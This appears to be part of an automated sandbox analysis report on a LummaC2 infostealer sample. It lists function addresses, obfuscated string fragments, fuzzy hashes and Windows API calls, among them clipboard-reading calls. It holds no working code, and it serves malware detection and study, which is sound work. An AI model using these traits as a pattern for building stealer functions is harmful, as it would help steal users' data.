'H%N, xrefs: 00EEB17A
gTuZ, xrefs: 00EEB18F
Kh;n, xrefs: 00EEB1B8
6\/b, xrefs: 00EEB19D
;lMr, xrefs: 00EEB1C2

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 'H%N$.L~R$6\/b$7$9D,J$;lMr$BpAv$DxY~$EtEz$Kh;n$fPcV$gTuZ
API String ID: 0-762781089
Opcode ID: 81f0766f105dcc10465c548128120f3d1300651f00349a5eb49d1545d072b002
Instruction ID: 6d9749f1a26c9e72bae829e904664da886591670b886627e770fd4d2ec2ecea7
Opcode Fuzzy Hash: 81f0766f105dcc10465c548128120f3d1300651f00349a5eb49d1545d072b002
Instruction Fuzzy Hash: D202BAB5204B05CFD730CF25D891797BBE2FB89300F15896CD5AA8B6A0CB78A842DF50

Function 00EF0F71 Relevance: 14.5, Strings: 11, Instructions: 732COMMON

Download Yara Rule

Strings

8, xrefs: 00EF1571
F, xrefs: 00EF0FF4
E, xrefs: 00EF1872
F, xrefs: 00EF1743
t, xrefs: 00EF12E2
5, xrefs: 00EF144C
*, xrefs: 00EF1579
x, xrefs: 00EF17E7
}, xrefs: 00EF0F7F
V, xrefs: 00EF187A
T, xrefs: 00EF186A

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: *$5$8$E$F$F$T$V$t$x$}
API String ID: 0-2030276459
Opcode ID: 020dd68cdc4380eed64cd5c2a2d43e77ada973bf0142e1ba7b0ac0b22b37af4e
Instruction ID: 78e1f8e7c6d294358bea41d004dfccf08366082256c67f8858ed942782bea9d4
Opcode Fuzzy Hash: 020dd68cdc4380eed64cd5c2a2d43e77ada973bf0142e1ba7b0ac0b22b37af4e
Instruction Fuzzy Hash: AD52AF7160D7848BC3289F38C4953AFBBE1ABC5324F199A6ED5D9E7381D6388941CB43

Function 00F01550 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

U, xrefs: 00F01952
[, xrefs: 00F01957
!@, xrefs: 00F01583
\, xrefs: 00F0175D
P, xrefs: 00F01961
\, xrefs: 00F01B06
,, xrefs: 00F01A6C
d, xrefs: 00F01767
R, xrefs: 00F0195C
k, xrefs: 00F01762
e, xrefs: 00F0176C

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$P$R$U$[$\$\$d$e$k
API String ID: 1279760036-3655135053
Opcode ID: 30640dbbfb790bea97a27d4b63815cbad8eee17d094467aa838c66303f6ce03b
Instruction ID: 29bdeef12560760408f34158cdf59cc883f610e198f3aab408085ba2e09e216e
Opcode Fuzzy Hash: 30640dbbfb790bea97a27d4b63815cbad8eee17d094467aa838c66303f6ce03b
Instruction Fuzzy Hash: D8228D7160C7808FD3258B28C4903AFBBE1BB96324F188A6DE5D5873D2D7798845EB53

Function 00EFE230 Relevance: 9.9, Strings: 7, Instructions: 1107COMMON

Download Yara Rule

Strings

pKp^, xrefs: 00EFE54E
]^he, xrefs: 00EFE55E
@Nxz, xrefs: 00EFE536
FEtp, xrefs: 00EFE5DF
WYRT, xrefs: 00EFE566
f, xrefs: 00EFE438
vvFE, xrefs: 00EFE546

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @Nxz$FEtp$WYRT$]^he$f$pKp^$vvFE
API String ID: 0-4211064948
Opcode ID: 039874d361676905534131789b0c345a5c6ddafcd9579e36bddb130f9cbd218e
Instruction ID: b3e68faeaa1b7612a0ea67023479276b24cbbd71ae01be7914bf3a786424adc1
Opcode Fuzzy Hash: 039874d361676905534131789b0c345a5c6ddafcd9579e36bddb130f9cbd218e
Instruction Fuzzy Hash: 24728E7160C3458FC725CF28C85067EBBE2AFC5314F188A6CE5E59B3A2D635E905CB52

Function 00EF5640 Relevance: 9.7, Strings: 7, Instructions: 943COMMON

Download Yara Rule

Strings

JHN], xrefs: 00EF5D66
Fi, xrefs: 00EF5D71
s|}, xrefs: 00EF606E
wq, xrefs: 00EF6063
UR, xrefs: 00EF5AE3
YU]&, xrefs: 00EF6170
>j%h, xrefs: 00EF5976

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 49c1034393755b90d5d2e980204f2d66b5c1520164e8bbeb571bef60869c82aa
Instruction ID: 48852bc2ebe0db00fbb6a68819ae8580742a08de962ef3f2aaff1cefdfdc64d6
Opcode Fuzzy Hash: 49c1034393755b90d5d2e980204f2d66b5c1520164e8bbeb571bef60869c82aa
Instruction Fuzzy Hash: E55245B26087448BD7249F28DC517BFB7E1FFD5314F189A2CE58997291EB349902CB42

Function 00EF1A94 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

%, xrefs: 00EF1E31
;, xrefs: 00EF1B11
U, xrefs: 00EF205E
c, xrefs: 00EF2059
1, xrefs: 00EF1C89
], xrefs: 00EF1DB7
', xrefs: 00EF1AA7

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: %$'$1$;$U$]$c
API String ID: 0-3216539101
Opcode ID: 36e809a40e6e833f40b000347a08ebd5c02eb05eac83d9fad290c52cd356518f
Instruction ID: ff4bc06cd77557789b04b3c1f714888b5841f7f9f527671e426c9271841c78d2
Opcode Fuzzy Hash: 36e809a40e6e833f40b000347a08ebd5c02eb05eac83d9fad290c52cd356518f
Instruction Fuzzy Hash: B712E37160C7848BC7249F38C4943EFBBE1AF85320F159A6DE6E9A73D1DA358845CB42

Function 00F11B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F11B24
GetClipboardData.USER32 ref: 00F11B3F
GlobalLock.KERNEL32 ref: 00F11B58
GetWindowLongW.USER32 ref: 00F11BC7
GlobalUnlock.KERNEL32 ref: 00F11CE7
CloseClipboard.USER32 ref: 00F11CF4

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 391ec2eef8bb670370c75a1b92df8b3123f1e7ea642408e130f77a7f02242d9a
Instruction ID: dbdbcbfcb97edd1b2bce494d2e6858fe165bb8e5936ec16e22df01c080323100
Opcode Fuzzy Hash: 391ec2eef8bb670370c75a1b92df8b3123f1e7ea642408e130f77a7f02242d9a
Instruction Fuzzy Hash: D751E07264C7818FC314AFBC988439EBEE1ABD5224F084B2DE6E4863D1D6648585E393

Function 00EE9290 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

RRP\, xrefs: 00EE96DE
kj, xrefs: 00EE9458
CM, xrefs: 00EE9608
clfg, xrefs: 00EE92E2
Egx|, xrefs: 00EE92CA
C, xrefs: 00EE95B5

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: C$CM$Egx|$RRP\$clfg$kj
API String ID: 0-2969717086
Opcode ID: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction ID: 611a66f17a255631c5adb363d4165e47fcec12a7c81e45d2e2268e7de9958e0f
Opcode Fuzzy Hash: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction Fuzzy Hash: DBC1497110C3D58FD316CF3A84A03ABBBE29FD7215F18996CE4E55B386D239490ACB52

Function 00EF8095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

', xrefs: 00EF9102
Q230, xrefs: 00EF8B93
d, xrefs: 00EF8726
K, xrefs: 00EF8162
(, xrefs: 00EF82E1

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: 980e978e74c24c48c00cd4c089104db16309aa7db7b5f9cab6c7fa8bc582db3b
Instruction ID: f2ac9df0bec692e9419a1f4fa3bad8d010c9e5b9fdbb8df717dc57d678da6fa5
Opcode Fuzzy Hash: 980e978e74c24c48c00cd4c089104db16309aa7db7b5f9cab6c7fa8bc582db3b
Instruction Fuzzy Hash: 319285716083418BD724CF28C8917BBBBE2FFC5354F18992DE5C99B2A1EB349905CB52

Function 00F026D3 Relevance: 7.0, Strings: 5, Instructions: 769COMMON

Download Yara Rule

Strings

?<, xrefs: 00F02AB6
1{, xrefs: 00F02A0E
0, xrefs: 00F02888
zw, xrefs: 00F02A06
r~, xrefs: 00F02A16

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$1{$?<$r~$zw
API String ID: 0-3209727026
Opcode ID: a14f51b5878094eb6cb38aac158fc64cd2aa904c2ee5577296b1ff33b7c4ff23
Instruction ID: 237420395e0156eadb2069a348959469b713e6eaefa4e4612321b8d38770727b
Opcode Fuzzy Hash: a14f51b5878094eb6cb38aac158fc64cd2aa904c2ee5577296b1ff33b7c4ff23
Instruction Fuzzy Hash: D2421675A08351CFD328CF28D89076ABBE1FF85314F19896CE8D59B391D7749802EB92

Function 00F070F9 Relevance: 5.8, Strings: 4, Instructions: 802COMMON

Download Yara Rule

Strings

>.8, xrefs: 00F074AC
LL, xrefs: 00F072E0
p, xrefs: 00F072D9
=&2), xrefs: 00F074BA

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: p$=&2)$>.8$LL
API String ID: 0-1181295447
Opcode ID: 0b173f12e0720613579fad1af7b7c1e01975108415e7cde8d01a8da2ea72b3de
Instruction ID: 73900789d3ee70dbe119c6fce914cc74f1b91bc1926a72e8b6a99e0c4776a052
Opcode Fuzzy Hash: 0b173f12e0720613579fad1af7b7c1e01975108415e7cde8d01a8da2ea72b3de
Instruction Fuzzy Hash: E5423675E01615CFDB18CF28D85176EB7B2FF85320F288269D856AB395DB34A812DBC0

Function 00EEC97C Relevance: 5.5, Strings: 4, Instructions: 533COMMON

Download Yara Rule

Strings

zw, xrefs: 00EED019
r~, xrefs: 00EED02F
1{, xrefs: 00EED024
?<, xrefs: 00EED0C2

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 1{$?<$r~$zw
API String ID: 0-614760689
Opcode ID: 594f3a6b034b610de963dd8d59cf0ca746f7c46387c43506ebb7db8d3a62a332
Instruction ID: 8582fe3e3bdd74d07e29d42ff20cd93cda97a58113bea5044818df6bdd1d051f
Opcode Fuzzy Hash: 594f3a6b034b610de963dd8d59cf0ca746f7c46387c43506ebb7db8d3a62a332
Instruction Fuzzy Hash: E402AAB02093C18AD735CF25D4947EFBBE1ABD6348F28996CC4D99B252C7384546CB92

Function 00EFC205 Relevance: 5.5, Strings: 4, Instructions: 508COMMON

Download Yara Rule

Strings

./, xrefs: 00EFC544
|r, xrefs: 00EFC5CC
{x, xrefs: 00EFC6B5
g`a, xrefs: 00EFC864

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: ./${x$g`a$|r
API String ID: 0-1262855476
Opcode ID: 779216b8f1c990eb5431304339c2fe8b5c81eee7cac497ee1ace2f2f975b42c5
Instruction ID: fbf4cfca0cb99616d38e1378c127e84f7d1f5ca18ce28432d8383032e8e45a1c
Opcode Fuzzy Hash: 779216b8f1c990eb5431304339c2fe8b5c81eee7cac497ee1ace2f2f975b42c5
Instruction Fuzzy Hash: 51F13AB7A5C7145FD308DF698C4216FFAE2EBC4304F19D92CE9D89B345DA3886058B86

Function 00F11D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00F11D59
GetSystemMetrics.USER32 ref: 00F11D69

Strings

, xrefs: 00F11E56

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 53f1b5b9012c9df91e7c39187102feca2532e6cee86d403389face90ee498f52
Instruction ID: 6abcdb47d9c298a66db8b926331705d7dc851bdecd7d360541ca3c43df698679
Opcode Fuzzy Hash: 53f1b5b9012c9df91e7c39187102feca2532e6cee86d403389face90ee498f52
Instruction Fuzzy Hash: 32A159B041D391CBD370DF58E498B9BBBE0BBC9308F90892DD5989B651C7B59448EF82

Function 00F059B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

/V, xrefs: 00F05A57
Y\, xrefs: 00F05A5F
U+, xrefs: 00F05A4F
!J, xrefs: 00F05A67

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: fff74dc1038940953fb7740ddfc084511df0ae095c9f6a91df4e0430bb846ef1
Instruction ID: 5570720beb76275a189be740dacf35572d810d1fcfaecea7436823ff478c5b70
Opcode Fuzzy Hash: fff74dc1038940953fb7740ddfc084511df0ae095c9f6a91df4e0430bb846ef1
Instruction Fuzzy Hash: DBE10FB5608344DFE3248F24E8817ABB7B1FB85704F54892CE6D55B2A2DB748806EF52

Function 00EEAB20 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

tefr, xrefs: 00EEAFAC, 00EEAD20, 00EEAD64, 00EEAEE3, 00EEAF78, 00EEAF81, 00EEAED7
a|}r, xrefs: 00EEAC66
tefr, xrefs: 00EEADEE
nww, xrefs: 00EEAD87

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: a|}r$nww$tefr$tefr
API String ID: 0-1676423017
Opcode ID: ae130e6c4ab6d92983b350cdf89d00d2c6e953e58d30ce6383f2be6bc1972fa9
Instruction ID: 61ad338d74073433158ad5e2f2ca105f729cb4a92deecabb2241907f452afd58
Opcode Fuzzy Hash: ae130e6c4ab6d92983b350cdf89d00d2c6e953e58d30ce6383f2be6bc1972fa9
Instruction Fuzzy Hash: 6AC106B124C3984BC320EF2588512ABFBE2DBD1308F1C996CE4D59F355E635980ACB57

Function 00F0C894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

0, xrefs: 00F0CB61
^TFW, xrefs: 00F0CC43
d, xrefs: 00F0CACA
@, xrefs: 00F0CBB3

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: 948b8e5a50cae9f1dad362110b6bdcb739ba5a4a4fc2ba9ed6ca8f180a8e02dd
Instruction ID: c7a41391cef836e9d1d0ff8620ea949de9dc63dd79d98bcfdc3c1139c98866c5
Opcode Fuzzy Hash: 948b8e5a50cae9f1dad362110b6bdcb739ba5a4a4fc2ba9ed6ca8f180a8e02dd
Instruction Fuzzy Hash: 867149B160C3814BD318CF3984A133BBFD1AFD6314F588A6DE4D68B2D2D6788546A792

Function 00EF64E0 Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

tuz, xrefs: 00EF670D
pv, xrefs: 00EF6702
L4, xrefs: 00EF6570
g, xrefs: 00EF67E1

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: g$pv$tuz$L4
API String ID: 2994545307-1811017061
Opcode ID: d53df86155bafc4fca550f529ee723cb2087a781f32b9266f706434a7018f0e2
Instruction ID: edf49e32759c544e2f4c302d88c8e0703382a2b9c5fd16a7419217cd49186fcc
Opcode Fuzzy Hash: d53df86155bafc4fca550f529ee723cb2087a781f32b9266f706434a7018f0e2
Instruction Fuzzy Hash: 2081FF326083598BD7308F24DC917AB73E2EFC4318F188938D589DB2A5EB74A946D752

Function 00EED35C Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 625COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 00EED368
CoUninitialize.OLE32 ref: 00EED7A4

Strings

(P, xrefs: 00EED7B2

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID: (P
API String ID: 3861434553-2012212641
Opcode ID: 25f416d0f18f55ed371067186e313fe75e6990db3e662fdd4269e00f7af07b2b
Instruction ID: 2cd6fd7754b7be9e65f4026191f2a216f4ae534c4e1de0d1f910b7d393cdafc8
Opcode Fuzzy Hash: 25f416d0f18f55ed371067186e313fe75e6990db3e662fdd4269e00f7af07b2b
Instruction Fuzzy Hash: DA22027154D3C28AD331CF39D8907DABFE1AF96308F188AACC4D96B242D735450ACB92

